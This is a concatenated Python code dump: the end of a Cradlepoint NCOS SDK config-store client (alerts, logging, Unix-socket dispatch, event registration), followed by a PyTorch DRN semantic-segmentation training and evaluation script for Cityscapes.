print("Timeout: device at {} did not respond.".format(device_ip))
return None
return json.loads(response.text)
def alert(self, app_name='', value=''):
"""
Constructs and sends a custom alert to NCM for the device. Apps calling this method must be running
on the target device to send the alert. If invoked while running on a computer, then only a log is output.
Args:
app_name: String name of your application.
value: String to displayed for the alert.
Returns:
Success: None
Failure: An error
"""
if sys.platform == 'linux2':
cmd = "alert\n{}\n{}\n".format(app_name, value)
return self._dispatch(cmd)
else:
# Running in a computer and can't actually send the alert.
print('Alert is only available when running the app in NCOS.')
print('Alert Text: {}'.format(value))
def log(self, value=''):
"""
Adds an INFO log to the device SYSLOG.
Args:
value: String text for the log.
Returns:
None
"""
if sys.platform == 'linux2':
self.logger.info(value)
else:
# Running in a computer so just use print for the log.
print(value)
def _get_auth(self, device_ip, username, password):
# This is only needed when the app is running in a computer.
# Returns the proper HTTP Auth for the global username and password.
# Digest Auth is used for NCOS 6.4 and below while Basic Auth is
# used for NCOS 6.5 and up.
import requests
from http import HTTPStatus
use_basic = False
device_api = 'http://{}/api/status/product_info'.format(device_ip)
try:
response = requests.get(device_api, auth=requests.auth.HTTPBasicAuth(username, password))
if response.status_code == HTTPStatus.OK:
use_basic = True
except:
use_basic = False
if use_basic:
return requests.auth.HTTPBasicAuth(username, password)
else:
return requests.auth.HTTPDigestAuth(username, password)
@staticmethod
def _get_device_access_info():
# Should only be called when running in a computer. It will return the
# dev_client_ip, dev_client_username, and dev_client_password as defined in
# the sdk section of the sdk_settings.ini file.
device_ip = ''
device_username = ''
device_password = ''
if sys.platform != 'linux2':
import os
import configparser
settings_file = os.path.join(os.path.dirname(os.getcwd()), 'sdk_settings.ini')
config = configparser.ConfigParser()
config.read(settings_file)
# Keys in sdk_settings.ini
sdk_key = 'sdk'
ip_key = 'dev_client_ip'
username_key = 'dev_client_username'
password_key = 'dev_client_password'
if sdk_key in config:
if ip_key in config[sdk_key]:
device_ip = config[sdk_key][ip_key]
else:
print('ERROR 1: The {} key does not exist in {}'.format(ip_key, settings_file))
if username_key in config[sdk_key]:
device_username = config[sdk_key][username_key]
else:
print('ERROR 2: The {} key does not exist in {}'.format(username_key, settings_file))
if password_key in config[sdk_key]:
device_password = config[sdk_key][password_key]
else:
print('ERROR 3: The {} key does not exist in {}'.format(password_key, settings_file))
else:
print('ERROR 4: The {} section does not exist in {}'.format(sdk_key, settings_file))
return device_ip, device_username, device_password
def _safe_dispatch(self, cmd):
"""Send the command and return the response."""
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as sock:
sock.connect('/var/tmp/cs.sock')
sock.sendall(bytes(cmd, 'ascii'))
return self._receive(sock)
def _dispatch(self, cmd):
errmsg = None
result = ""
try:
result = self._safe_dispatch(cmd)
except Exception as err:
# ignore the command error, continue on to next command
errmsg = "dispatch failed with exception={} err={}".format(type(err), str(err))
if errmsg is not None:
self.log(self.app_name, errmsg)
pass
return result
def _safe_receive(self, sock):
sock.settimeout(self.RECV_TIMEOUT)
data = b""
eoh = -1
while eoh < 0:
# In the event that the config store times out in returning data, lib returns
# an empty result. Then again, if the config store hangs for 2+ seconds,
# the app's behavior is the least of our worries.
try:
buf = sock.recv(self.MAX_PACKET_SIZE)
except socket.timeout:
return {"status": "timeout", "data": None}
if len(buf) == 0:
break
data += buf
eoh = data.find(self.END_OF_HEADER)
status_hdr = self.STATUS_HEADER_RE.search(data).group(0)[8:]
content_len = self.CONTENT_LENGTH_HEADER_RE.search(data).group(0)[16:]
remaining = int(content_len) - (len(data) - eoh - len(self.END_OF_HEADER))
# body sent from csevent_xxx.sock will have id, action, path, & cfg
while remaining > 0:
buf = sock.recv(self.MAX_PACKET_SIZE) # TODO: This will hang things as well.
if len(buf) == 0:
break
data += buf
remaining -= len(buf)
body = data[eoh:].decode()
try:
result = json.loads(body)
except json.JSONDecodeError as e:
# config store receiver doesn't give back
# proper json for 'put' ops, body
# contains verbose error message
# so putting the error msg in result
result = body.strip()
return {"status": status_hdr.decode(), "data": result}
def _receive(self, sock):
errmsg = None
result = ""
try:
result = self._safe_receive(sock)
except Exception as err:
# ignore the command error, continue on to next command
errmsg = "_receive failed with exception={} err={}".format(type(err), str(err))
if errmsg is not None:
self.log(self.app_name, errmsg)
return result
class EventingCSClient(CSClient):
running = False
registry = {}
eids = 1
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.on = self.register
self.un = self.unregister
def start(self):
if self.running:
self.log(f"Eventing Config Store {self.pid} already running")
return
self.running = True
self.pid = os.getpid()
self.f = '/var/tmp/csevent_%d.sock' % self.pid
try:
os.unlink(self.f)
except FileNotFoundError:
pass
self.event_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.event_sock.bind(self.f)
self.event_sock.listen() # backlog is optional. already set on value found in /proc
self.event_sock.setblocking(False)
self.eloop = threading.Thread(target=self._handle_events)
self.eloop.start()
def stop(self):
if not self.running:
return
self.log(f"Stopping {self.app_name}")
for k in list(self.registry.keys()):
self.unregister(k)
self.event_sock.close()
os.unlink(self.f)
self.running = False
def _handle_events(self):
poller = select.poll()
poller.register(self.event_sock,
select.POLLIN | select.POLLERR | select.POLLHUP) # I don't unregsiter this in cleaning up!
while self.running:
try:
events = poller.poll(1000)
for f, ev in events:
if ev & (select.POLLERR | select.POLLHUP):
self.log("Hangup/error received. Stopping")
self.stop() # TODO: restart w/ cached registrations. Will no longer be an error case
if ev & select.POLLIN:
conn, addr = self.event_sock.accept()
result = self._receive(conn)
eid = int(result['data']['id'])
try:
cb = self.registry[eid]['cb']
args = self.registry[eid]['args']
try:
# PUTting just a string to config store results in a json encoded string returned.
# e.g. set /config/system/logging/level "debug", result['data']['cfg'] is '"debug"'
cfg = json.loads(result['data']['cfg'])
except TypeError as e:
# Non-string path
cfg = result['data']['cfg']
try:
cb_return = cb(result['data']['path'], cfg, args)
except:
if traceback:
traceback.print_exc()
self.log(f"Exception during callback for {str(self.registry[eid])}")
if result['data']['action'] == 'get': # We've something to send back.
# config_store_receiver expects json
cb_return = json.JSONEncoder().encode(cb_return)
conn.sendall(
cb_return.encode()) # No dispatch. Config store receiver will put to config store.
except (NameError, ValueError) as e:
self.log(f"Could not find register data for eid {eid}")
except OSError as e:
self.log(f"OSError: {e}")
raise
def register(self, action: object, path: object, callback: object, *args: object) -> object:
if not self.running:
self.start()
# what about multiple registration?
eid = self.eids
self.eids += 1
self.registry[eid] = {'cb': callback, 'action': action, 'path': path, 'args': args}
cmd = "register\n{}\n{}\n{}\n{}\n".format(self.pid, eid, action, path)
return self._dispatch(cmd)
def unregister(self, eid):
ret = ""
try:
e = self.registry[eid]
except KeyError:
pass
else:
if self.running:
cmd = "unregister\n{}\n{}\n{}\n{}\n".format(self.pid, eid, e['action'], e['path'])
ret = self._dispatch(cmd)
del self.registry[eid]
return ret
def clean_up_reg(signal, frame):
"""
When 'cppython remote_port_forward.py' gets a SIGTERM, config_store_receiver.py doesn't
clean up registrations. Even if it did, the comm module can't rely on an external service
to clean up.
"""
EventingCSClient().stop()
sys.exit(0)
signal.signal(signal.SIGTERM, clean_up_reg)
|
segment.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import argparse
import json
import logging
import math
import os
import shutil
import sys
import threading
import time
from os.path import exists, join, split
import numpy as np
import torch
import torch.backends.cudnn as cudnn
from PIL import Image
from torch import nn
from torch.autograd import Variable
from torchvision import transforms
from . import data_transforms as transforms
from . import drn
try:
from modules import batchnormsync
except ImportError:
pass
FORMAT = "[%(asctime)-15s %(filename)s:%(lineno)d %(funcName)s] %(message)s"
logging.basicConfig(format=FORMAT)
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
CITYSCAPE_PALETTE = np.asarray([
[128, 64, 128],
[244, 35, 232],
[70, 70, 70],
[102, 102, 156],
[190, 153, 153],
[153, 153, 153],
[250, 170, 30],
[220, 220, 0],
[107, 142, 35],
[152, 251, 152],
[70, 130, 180],
[220, 20, 60],
[255, 0, 0],
[0, 0, 142],
[0, 0, 70],
[0, 60, 100],
[0, 80, 100],
[0, 0, 230],
[119, 11, 32],
[0, 0, 0]], dtype=np.uint8)
def fill_up_weights(up):
w = up.weight.data
f = math.ceil(w.size(2) / 2)
c = (2 * f - 1 - f % 2) / (2. * f)
for i in range(w.size(2)):
for j in range(w.size(3)):
w[0, 0, i, j] = \
(1 - math.fabs(i / f - c)) * (1 - math.fabs(j / f - c))
for c in range(1, w.size(0)):
w[c, 0, :, :] = w[0, 0, :, :]
class DRNSeg(nn.Module):
def __init__(self, model_name, classes, pretrained_model=None,
pretrained=True, use_torch_up=False):
super(DRNSeg, self).__init__()
model = drn.__dict__.get(model_name)(
pretrained=pretrained, num_classes=1000)
pmodel = nn.DataParallel(model)
if pretrained_model is not None:
pmodel.load_state_dict(pretrained_model)
self.base = nn.Sequential(*list(model.children())[:-2])
self.seg = nn.Conv2d(model.out_dim, classes,
kernel_size=1, bias=True)
self.softmax = nn.LogSoftmax()
m = self.seg
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
m.bias.data.zero_()
if use_torch_up:
self.up = nn.UpsamplingBilinear2d(scale_factor=8)
else:
up = nn.ConvTranspose2d(classes, classes, 16, stride=8, padding=4,
output_padding=0, groups=classes,
bias=False)
fill_up_weights(up)
up.weight.requires_grad = False
self.up = up
def forward(self, x):
x = self.base(x)
x = self.seg(x)
y = self.up(x)
return y, x
def optim_parameters(self, memo=None):
for param in self.base.parameters():
yield param
for param in self.seg.parameters():
yield param
class SegList(torch.utils.data.Dataset):
def __init__(self, data_dir, phase, transforms, list_dir=None,
out_name=False):
self.list_dir = data_dir if list_dir is None else list_dir
self.data_dir = data_dir
self.out_name = out_name
self.phase = phase
self.transforms = transforms
self.image_list = None
self.label_list = None
self.bbox_list = None
self.read_lists()
def __getitem__(self, index):
img = Image.open(join(self.data_dir, self.image_list[index]))
data = [img]
if self.label_list is not None:
label = Image.open(join(self.data_dir, self.label_list[index]))
# label = label.resize([int(label.size[0]*0.25), int(label.size[1]*0.25)], Image.NEAREST)
data.append(label)
data[0] = self.transforms(data[0])
if self.label_list is not None:
data[1] = torch.LongTensor(np.array(data[1]))
if self.out_name:
if self.label_list is None:
data.append(data[0][0, :, :])
data.append(self.image_list[index])
return tuple(data)
def __len__(self):
return len(self.image_list)
def read_lists(self):
image_path = join(self.list_dir, self.phase + '_images.txt')
label_path = join(self.list_dir, self.phase + '_labels.txt')
assert exists(image_path)
self.image_list = [line.strip() for line in open(image_path, 'r')]
if exists(label_path):
self.label_list = [line.strip() for line in open(label_path, 'r')]
assert len(self.image_list) == len(self.label_list)
class SegListSeg(torch.utils.data.Dataset):
def __init__(self, data_dir, phase, transforms, starting=None, ending=None, list_dir=None,
out_name=False):
self.list_dir = data_dir if list_dir is None else list_dir
self.data_dir = data_dir
self.out_name = out_name
self.phase = phase
self.transforms = transforms
self.image_list = None
self.label_list = None
self.bbox_list = None
self.starting = starting
self.ending = ending
self.read_lists()
def __getitem__(self, index):
img = Image.open(join(self.data_dir, self.image_list[index]))
data = [img]
if self.label_list is not None:
label = Image.open(join(self.data_dir, self.label_list[index]))
# label = label.resize([int(label.size[0]*0.25), int(label.size[1]*0.25)], Image.NEAREST)
data.append(label)
data[0] = self.transforms(data[0])
if self.label_list is not None:
data[1] = torch.LongTensor(np.array(data[1]))
if self.out_name:
if self.label_list is None:
data.append(data[0][0, :, :])
data.append(self.image_list[index])
return tuple(data)
def __len__(self):
return len(self.image_list)
def read_lists(self):
image_path = join(self.list_dir, self.phase + '_images.txt')
label_path = join(self.list_dir, self.phase + '_labels.txt')
assert exists(image_path)
self.image_list = [line.strip() for line in open(image_path, 'r')]
# self.image_list.sort()
if self.starting is not None:
assert self.starting < len(self.image_list)
if self.ending is not None:
assert self.ending <= len(self.image_list)
if (self.starting is not None) and (self.ending is not None):
assert self.starting < self.ending
if (self.starting is not None) and (self.ending is None):
self.image_list = self.image_list[self.starting:]
elif (self.ending is not None) and (self.starting is None):
self.image_list = self.image_list[:self.ending]
elif (self.ending is not None) and (self.starting is not None):
self.image_list = self.image_list[self.starting:self.ending]
if exists(label_path):
self.label_list = [line.strip() for line in open(label_path, 'r')]
# self.label_list.sort()
if (self.starting is not None) and (self.ending is None):
self.label_list = self.label_list[self.starting:]
elif (self.ending is not None) and (self.starting is None):
self.label_list = self.label_list[:self.ending]
elif (self.ending is not None) and (self.starting is not None):
self.label_list = self.label_list[self.starting:self.ending]
assert len(self.image_list) == len(self.label_list)
class SegListSegAdv(torch.utils.data.Dataset):
def __init__(self, data_dir, phase, transforms, starting=None, ending=None, list_dir=None,
out_name=False):
self.list_dir = data_dir if list_dir is None else list_dir
self.data_dir = data_dir
self.out_name = out_name
self.phase = phase
self.transforms = transforms
self.image_list = None
self.label_list = None
self.bbox_list = None
self.box_list = None
self.target_list = None
self.starting = starting
self.ending = ending
self.read_lists()
def __getitem__(self, index):
img = Image.open(join(self.data_dir, self.image_list[index]))
data = [img]
if self.label_list is not None:
label = Image.open(join(self.data_dir, self.label_list[index]))
label1 = Image.open(join(self.data_dir, self.label_list[index])[:-4]+'1.png')
# label = label.resize([int(label.size[0]*0.25), int(label.size[1]*0.25)], Image.NEAREST)
data.append(label)
data.append(label1)
data[0] = self.transforms(data[0])
if self.label_list is not None:
data[1] = torch.LongTensor(np.array(data[1]))
data[2] = torch.LongTensor(np.array(data[2]))
if self.out_name:
if self.label_list is None:
data.append(data[0][0, :, :])
data.append(self.image_list[index])
data.append(self.box_list[index])
data.append(self.target_list[index])
return tuple(data)
def __len__(self):
return len(self.image_list)
def read_lists(self):
image_path = join(self.list_dir, self.phase + '_images.txt')
label_path = join(self.list_dir, self.phase + '_labels.txt')
box_path = join(self.list_dir, self.phase + '_box.txt')
target_path = join(self.list_dir, self.phase + '_target.txt')
# box_path = join(self.list_dir, self.phase + '_target.txt')
assert exists(image_path)
self.image_list = [line.strip() for line in open(image_path, 'r')]
# self.image_list.sort()
if self.starting is not None:
assert self.starting < len(self.image_list)
if self.ending is not None:
assert self.ending <= len(self.image_list)
if (self.starting is not None) and (self.ending is not None):
assert self.starting < self.ending
if (self.starting is not None) and (self.ending is None):
self.image_list = self.image_list[self.starting:]
elif (self.ending is not None) and (self.starting is None):
self.image_list = self.image_list[:self.ending]
elif (self.ending is not None) and (self.starting is not None):
self.image_list = self.image_list[self.starting:self.ending]
if exists(label_path):
self.label_list = [line.strip() for line in open(label_path, 'r')]
# self.label_list.sort()
if (self.starting is not None) and (self.ending is None):
self.label_list = self.label_list[self.starting:]
elif (self.ending is not None) and (self.starting is None):
self.label_list = self.label_list[:self.ending]
elif (self.ending is not None) and (self.starting is not None):
self.label_list = self.label_list[self.starting:self.ending]
assert len(self.image_list) == len(self.label_list)
if exists(box_path):
self.box_list = [line.strip() for line in open(box_path, 'r')]
# self.label_list.sort()
if (self.starting is not None) and (self.ending is None):
self.box_list = self.box_list[self.starting:]
elif (self.ending is not None) and (self.starting is None):
self.box_list = self.box_list[:self.ending]
elif (self.ending is not None) and (self.starting is not None):
self.box_list = self.box_list[self.starting:self.ending]
# assert len(self.image_list) == len(self.box_list)
if exists(box_path):
self.target_list = [line.strip() for line in open(target_path, 'r')]
# self.label_list.sort()
if (self.starting is not None) and (self.ending is None):
self.target_list = self.target_list[self.starting:]
elif (self.ending is not None) and (self.starting is None):
self.target_list = self.target_list[:self.ending]
elif (self.ending is not None) and (self.starting is not None):
self.target_list = self.target_list[self.starting:self.ending]
assert len(self.image_list) == len(self.target_list)
class SegListMS(torch.utils.data.Dataset):
def __init__(self, data_dir, phase, transforms, scales, list_dir=None):
self.list_dir = data_dir if list_dir is None else list_dir
self.data_dir = data_dir
self.phase = phase
self.transforms = transforms
self.image_list = None
self.label_list = None
self.bbox_list = None
self.read_lists()
self.scales = scales
def __getitem__(self, index):
data = [Image.open(join(self.data_dir, self.image_list[index]))]
w, h = data[0].size
if self.label_list is not None:
data.append(Image.open(join(self.data_dir, self.label_list[index])))
# data = list(self.transforms(*data))
out_data = list(self.transforms(*data))
ms_images = [self.transforms(data[0].resize((int(w * s), int(h * s)),
Image.BICUBIC))[0]
for s in self.scales]
out_data.append(self.image_list[index])
out_data.extend(ms_images)
return tuple(out_data)
def __len__(self):
return len(self.image_list)
def read_lists(self):
image_path = join(self.list_dir, self.phase + '_images.txt')
label_path = join(self.list_dir, self.phase + '_labels.txt')
assert exists(image_path)
self.image_list = [line.strip() for line in open(image_path, 'r')]
if exists(label_path):
self.label_list = [line.strip() for line in open(label_path, 'r')]
assert len(self.image_list) == len(self.label_list)
def validate(val_loader, model, criterion, eval_score=None, print_freq=10):
batch_time = AverageMeter()
losses = AverageMeter()
score = AverageMeter()
# switch to evaluate mode
model.eval()
end = time.time()
for i, (input, target) in enumerate(val_loader):
if type(criterion) in [torch.nn.modules.loss.L1Loss,
torch.nn.modules.loss.MSELoss]:
target = target.float()
input = input.cuda()
target = target.cuda()
# target = target.cuda(async=True)
input_var = torch.autograd.Variable(input, volatile=True)
target_var = torch.autograd.Variable(target, volatile=True)
# compute output
output = model(input_var)[0]
loss = criterion(output, target_var)
# measure accuracy and record loss
# prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
losses.update(loss.data[0], input.size(0))
if eval_score is not None:
score.update(eval_score(output, target_var), input.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % print_freq == 0:
logger.info('Test: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Score {score.val:.3f} ({score.avg:.3f})'.format(
i, len(val_loader), batch_time=batch_time, loss=losses,
score=score))
logger.info(' * Score {top1.avg:.3f}'.format(top1=score))
return score.avg
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def accuracy(output, target):
"""Computes the precision@k for the specified values of k"""
# batch_size = target.size(0) * target.size(1) * target.size(2)
_, pred = output.max(1)
pred = pred.view(1, -1)
target = target.view(1, -1)
correct = pred.eq(target)
correct = correct[target != 255]
correct = correct.view(-1)
score = correct.float().sum(0).mul(100.0 / correct.size(0))
return score.data[0]
def train(train_loader, model, criterion, optimizer, epoch,
eval_score=None, print_freq=10):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
scores = AverageMeter()
# switch to train mode
model.train()
end = time.time()
for i, (input, target) in enumerate(train_loader):
# measure data loading time
data_time.update(time.time() - end)
if type(criterion) in [torch.nn.modules.loss.L1Loss,
torch.nn.modules.loss.MSELoss]:
target = target.float()
input = input.cuda()
target = target.cuda()
# target = target.cuda(async=True)
input_var = torch.autograd.Variable(input)
target_var = torch.autograd.Variable(target)
# compute output
output = model(input_var)[0]
loss = criterion(output, target_var)
# measure accuracy and record loss
# prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
losses.update(loss.data[0], input.size(0))
if eval_score is not None:
scores.update(eval_score(output, target_var), input.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % print_freq == 0:
logger.info('Epoch: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Score {top1.val:.3f} ({top1.avg:.3f})'.format(
epoch, i, len(train_loader), batch_time=batch_time,
data_time=data_time, loss=losses, top1=scores))
def save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, 'model_best.pth.tar')
def train_seg(args):
batch_size = args.batch_size
num_workers = args.workers
crop_size = args.crop_size
print(' '.join(sys.argv))
for k, v in args.__dict__.items():
print(k, ':', v)
single_model = DRNSeg(args.arch, args.classes, None,
pretrained=True)
if args.pretrained:
single_model.load_state_dict(torch.load(args.pretrained))
model = torch.nn.DataParallel(single_model).cuda()
criterion = nn.NLLLoss2d(ignore_index=255)
criterion.cuda()
# Data loading code
data_dir = args.data_dir
info = json.load(open(join(data_dir, 'info.json'), 'r'))
normalize = transforms.Normalize(mean=info['mean'],
std=info['std'])
t = []
if args.random_rotate > 0:
t.append(transforms.RandomRotate(args.random_rotate))
if args.random_scale > 0:
t.append(transforms.RandomScale(args.random_scale))
t.extend([transforms.RandomCrop(crop_size),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize])
train_loader = torch.utils.data.DataLoader(
SegList(data_dir, 'train', transforms.Compose(t)),
batch_size=batch_size, shuffle=True, num_workers=num_workers,
pin_memory=True, drop_last=True
)
val_loader = torch.utils.data.DataLoader(
SegList(data_dir, 'val', transforms.Compose([
transforms.RandomCrop(crop_size),
transforms.ToTensor(),
normalize,
])),
batch_size=batch_size, shuffle=False, num_workers=num_workers,
pin_memory=True, drop_last=True
)
# define loss function (criterion) and pptimizer
optimizer = torch.optim.SGD(single_model.optim_parameters(),
args.lr,
momentum=args.momentum,
weight_decay=args.weight_decay)
cudnn.benchmark = True
best_prec1 = 0
start_epoch = 0
# optionally resume from a checkpoint
if args.resume:
if os.path.isfile(args.resume):
print("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
start_epoch = checkpoint['epoch']
best_prec1 = checkpoint['best_prec1']
model.load_state_dict(checkpoint['state_dict'])
print("=> loaded checkpoint '{}' (epoch {})"
.format(args.resume, checkpoint['epoch']))
else:
print("=> no checkpoint found at '{}'".format(args.resume))
if args.evaluate:
validate(val_loader, model, criterion, eval_score=accuracy)
return
for epoch in range(start_epoch, args.epochs):
lr = adjust_learning_rate(args, optimizer, epoch)
logger.info('Epoch: [{0}]\tlr {1:.06f}'.format(epoch, lr))
# train for one epoch
train(train_loader, model, criterion, optimizer, epoch,
eval_score=accuracy)
# evaluate on validation set
prec1 = validate(val_loader, model, criterion, eval_score=accuracy)
is_best = prec1 > best_prec1
best_prec1 = max(prec1, best_prec1)
checkpoint_path = 'checkpoint_latest.pth.tar'
save_checkpoint({
'epoch': epoch + 1,
'arch': args.arch,
'state_dict': model.state_dict(),
'best_prec1': best_prec1,
}, is_best, filename=checkpoint_path)
if (epoch + 1) % 10 == 0:
history_path = 'checkpoint_{:03d}.pth.tar'.format(epoch + 1)
shutil.copyfile(checkpoint_path, history_path)
def adjust_learning_rate(args, optimizer, epoch):
"""Sets the learning rate to the initial LR decayed by 10 every 30 epochs"""
if args.lr_mode == 'step':
lr = args.lr * (0.1 ** (epoch // args.step))
elif args.lr_mode == 'poly':
lr = args.lr * (1 - epoch / args.epochs) ** 0.9
else:
raise ValueError('Unknown lr mode {}'.format(args.lr_mode))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
return lr
def fast_hist(pred, label, n):
k = (label >= 0) & (label < n)
return np.bincount(
n * label[k].astype(int) + pred[k], minlength=n ** 2).reshape(n, n)
def per_class_iu(hist):
return np.diag(hist) / (hist.sum(1) + hist.sum(0) - np.diag(hist))
def save_output_images(predictions, filenames, output_dir):
"""
Saves a given (B x C x H x W) into an image file.
If given a mini-batch tensor, will save the tensor as a grid of images.
"""
# pdb.set_trace()
for ind in range(len(filenames)):
im = Image.fromarray(predictions[ind].astype(np.uint8))
fn = os.path.join(output_dir, filenames[ind][:-4] + '.png')
out_dir = split(fn)[0]
if not exists(out_dir):
os.makedirs(out_dir)
im.save(fn)
def save_colorful_images(predictions, filenames, output_dir, palettes):
"""
Saves a given (B x C x H x W) into an image file.
If given a mini-batch tensor, will save the tensor as a grid of images.
"""
for ind in range(len(filenames)):
im = Image.fromarray(palettes[predictions[ind].squeeze()])
fn = os.path.join(output_dir, filenames[ind][:-4] + '.png')
out_dir = split(fn)[0]
if not exists(out_dir):
os.makedirs(out_dir)
im.save(fn)
def test(eval_data_loader, model, num_classes,
output_dir='pred', has_gt=True, save_vis=False):
model.eval()
batch_time = AverageMeter()
data_time = AverageMeter()
end = time.time()
hist = np.zeros((num_classes, num_classes))
for iter, (image, label, name) in enumerate(eval_data_loader):
data_time.update(time.time() - end)
image_var = Variable(image, requires_grad=False, volatile=True)
final = model(image_var)[0]
_, pred = torch.max(final, 1)
pred = pred.cpu().data.numpy()
batch_time.update(time.time() - end)
if save_vis:
save_output_images(pred, name, output_dir)
save_colorful_images(pred, name, output_dir + '_color',
CITYSCAPE_PALETTE)
if has_gt:
label = label.numpy()
hist += fast_hist(pred.flatten(), label.flatten(), num_classes)
logger.info('===> mAP {mAP:.3f}'.format(
mAP=round(np.nanmean(per_class_iu(hist)) * 100, 2)))
end = time.time()
logger.info('Eval: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
.format(iter, len(eval_data_loader), batch_time=batch_time,
data_time=data_time))
if has_gt: #val
ious = per_class_iu(hist) * 100
logger.info(' '.join('{:.03f}'.format(i) for i in ious))
return round(np.nanmean(ious), 2)
def resize_4d_tensor(tensor, width, height):
tensor_cpu = tensor.cpu().numpy()
if tensor.size(2) == height and tensor.size(3) == width:
return tensor_cpu
out_size = (tensor.size(0), tensor.size(1), height, width)
out = np.empty(out_size, dtype=np.float32)
def resize_one(i, j):
out[i, j] = np.array(
Image.fromarray(tensor_cpu[i, j]).resize(
(width, height), Image.BILINEAR))
def resize_channel(j):
for i in range(tensor.size(0)):
out[i, j] = np.array(
Image.fromarray(tensor_cpu[i, j]).resize(
(width, height), Image.BILINEAR))
# workers = [threading.Thread(target=resize_one, args=(i, j))
# for i in range(tensor.size(0)) for j in range(tensor.size(1))]
workers = [threading.Thread(target=resize_channel, args=(j,))
for j in range(tensor.size(1))]
for w in workers:
w.start()
for w in workers:
w.join()
# for i in range(tensor.size(0)):
# for j in range(tensor.size(1)):
# out[i, j] = np.array(
# Image.fromarray(tensor_cpu[i, j]).resize(
# (w, h), Image.BILINEAR))
# out = tensor.new().resize_(*out.shape).copy_(torch.from_numpy(out))
return out
def test_ms(eval_data_loader, model, num_classes, scales,
output_dir='pred', has_gt=True, save_vis=False):
model.eval()
batch_time = AverageMeter()
data_time = AverageMeter()
end = time.time()
hist = np.zeros((num_classes, num_classes))
num_scales = len(scales)
for iter, input_data in enumerate(eval_data_loader):
data_time.update(time.time() - end)
if has_gt:
name = input_data[2]
label = input_data[1]
else:
name = input_data[1]
h, w = input_data[0].size()[2:4]
images = [input_data[0]]
images.extend(input_data[-num_scales:])
# pdb.set_trace()
outputs = []
for image in images:
image_var = Variable(image, requires_grad=False, volatile=True)
final = model(image_var)[0]
outputs.append(final.data)
final = sum([resize_4d_tensor(out, w, h) for out in outputs])
# _, pred = torch.max(torch.from_numpy(final), 1)
# pred = pred.cpu().numpy()
pred = final.argmax(axis=1)
batch_time.update(time.time() - end)
if save_vis:
save_output_images(pred, name, output_dir)
save_colorful_images(pred, name, output_dir + '_color',
CITYSCAPE_PALETTE)
if has_gt:
label = label.numpy()
hist += fast_hist(pred.flatten(), label.flatten(), num_classes)
logger.info('===> mAP {mAP:.3f}'.format(
mAP=round(np.nanmean(per_class_iu(hist)) * 100, 2)))
end = time.time()
logger.info('Eval: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
.format(iter, len(eval_data_loader), batch_time=batch_time,
data_time=data_time))
if has_gt: #val
ious = per_class_iu(hist) * 100
logger.info(' '.join('{:.03f}'.format(i) for i in ious))
return round(np.nanmean(ious), 2)
def test_seg(args):
batch_size = args.batch_size
num_workers = args.workers
phase = args.phase
for k, v in args.__dict__.items():
print(k, ':', v)
single_model = DRNSeg(args.arch, args.classes, pretrained_model=None,
pretrained=False)
if args.pretrained:
single_model.load_state_dict(torch.load(args.pretrained))
model = torch.nn.DataParallel(single_model).cuda()
data_dir = args.data_dir
info = json.load(open(join(data_dir, 'info.json'), 'r'))
normalize = transforms.Normalize(mean=info['mean'], std=info['std'])
scales = [0.5, 0.75, 1.25, 1.5, 1.75]
if args.ms:
dataset = SegListMS(data_dir, phase, transforms.Compose([
transforms.ToTensor(),
normalize,
]), scales)
else:
dataset = SegList(data_dir, phase, transforms.Compose([
transforms.ToTensor(),
normalize,
]), out_name=True)
test_loader = torch.utils.data.DataLoader(
dataset,
batch_size=batch_size, shuffle=False, num_workers=num_workers,
pin_memory=False
)
cudnn.benchmark = True
# optionally resume from a checkpoint
start_epoch = 0
if args.resume:
if os.path.isfile(args.resume):
logger.info("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
start_epoch = checkpoint['epoch']
best_prec1 = checkpoint['best_prec1']
model.load_state_dict(checkpoint['state_dict'])
logger.info("=> loaded checkpoint '{}' (epoch {})"
.format(args.resume, checkpoint['epoch']))
else:
logger.info("=> no checkpoint found at '{}'".format(args.resume))
out_dir = '{}_{:03d}_{}'.format(args.arch, start_epoch, phase)
if len(args.test_suffix) > 0:
out_dir += '_' + args.test_suffix
if args.ms:
out_dir += '_ms'
if args.ms:
mAP = test_ms(test_loader, model, args.classes, save_vis=True,
has_gt=phase != 'test' or args.with_gt,
output_dir=out_dir,
scales=scales)
else:
mAP = test(test_loader, model, args.classes, save_vis=True,
has_gt=phase != 'test' or args.with_gt, output_dir=out_dir)
logger.info('mAP: %f', mAP)
def parse_args():
# Training settings
parser = argparse.ArgumentParser(description='')
parser.add_argument('cmd', choices=['train', 'test'])
parser.add_argument('-d', '--data-dir', default="/mnt/HDD2/datasets/cityscapes/")
parser.add_argument('--save-dir', default='data_val/vis')
